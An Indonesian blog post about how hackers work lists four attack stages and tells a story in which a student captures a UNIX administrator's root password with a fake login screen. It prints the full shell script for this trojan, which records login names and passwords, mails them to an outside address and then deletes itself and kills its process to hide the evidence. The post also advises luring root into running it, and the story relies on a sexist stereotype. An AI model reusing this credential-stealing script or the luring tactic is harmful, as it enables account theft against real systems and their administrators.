MEMAHAMI HACKER BEKERJA

MEMAHAMI HACKER BEKERJA
Secara umum melalui tahapan-tahapan sebagai berikut :
1. Tahap mencari tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap penjelajahan
4. Tahap keluar dan menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

0 comments:

Post a Comment

Often In Search

Mayoritas Daerah Menunggu Formasi CPNS 2010 Lowongan CPNS Tenaga Medis di Tarakan Tes CPNS Kejaksaan Jambi Lowongan CPNS Kementrian Perhubungan Formasi Tenaga Teknis Paling Banyak Dibutuhkan Perekrutan CPNS Kaltim 2010 BNN dan BKKBN Buka Lowongan CPNS Penerimaan Cpns Dosen UNM Formasi CPNS Dosen dan Teknis di Unhas Penerimaan Cpns Pemprov Sumatera Utara Lowongan CPNS di Kejati Jateng Lowongan Formasi CPNS Pemkab Brebes Penerimaan CPNS Bangka 2010 Penerimaan CPNS USU 2010 Ujian CPNS Bekerjasama dengan PTN dan LSM Lowongan CPNS Provinsi Sumatera Barat (Sumbar) Tahun 2009 Pemkot Pontianak Bagikan Nomor Peserta Test CPNS November 2009 Lowongan CPNS Kementrian Pemberdayaan Perempuan dan Perlindungan Anak 2010 Lowongan CPNS di Kabupaten Bandung Banyak Posisi Lowongan CPNS Kementrian Pekerjaan Umum (PU) 2010 cpns kementan 2010 cpns kementan hasil seleksi cpns D3 pertanian kementrian pertanian CPNS 2010 pendidikan kimia pengumuman kelulusan cpns kementrian pertanian pengumuman seleksi cpns kementan pengumuman seleksi cpns kementan 2010 pengumuman seleksi lamaran deptan go id pertanian CPNS Kalteng 2010 CPNS Sulsel 2010 CPNS Bengkulu 2010 CPNS Jawa Tengah 2010 CPNS Kemdiknas 2010 CPNS Kejaksaan 2010 CPNS KEMENKES/DEPKES 2010 CPNS SUMUT 2010 CPNS DKI Jakarta 2010 Formasi CPNS Depag 2010 Lowongan Application Technician di Jakarta Januari Februari 2010 Penerimaan CPNSD Provinsi Jawa Timur Tahun 2009 CPNS Kejaksaan Tahun 2010 Lowongan CPNS Kabupaten Dairi Bulan November Tahun 2009 Pengumuman Hasil Seleksi Administrasi CPNS PPATK 2010 cpns pengadilan 2010 www depkumham go id cpns sumbar 2010 cpns medan 2010 lowongan cpns sumbar 2010 cpns 2010 medan www depkumham go id pengumuman pengumuman seleksi administrasi cpns depkumham 2010 pengumuman hasil seleksi administrasi depkumham 2010 cpns sumsel 2010 pendaftaran cpns kab mojokerto tahun 2010 hasil tes cpns depkumham 2010 kalteng pormasi cpns kab bone lowongan cpns 2010 kabupaten pesisir selatan lowongan administrasi tangerang september 2010 Cpns november sumatera selatan 2010 jadwal pendaftaran cpns sumbar 2010 pengumuman cpnsd kab gunung kidul 2010 pengumuman tes cpns sumbar 2010 penerimaan cpns kodam wirabuana memblokir instal program cara memblok instalasi kenapa warnet lambat loading CRA INSTAL BILING SERVER cara gunakan wp super cache cara koneksi client billing dengan server trik memblokir install sembarangan cara mengatasi index of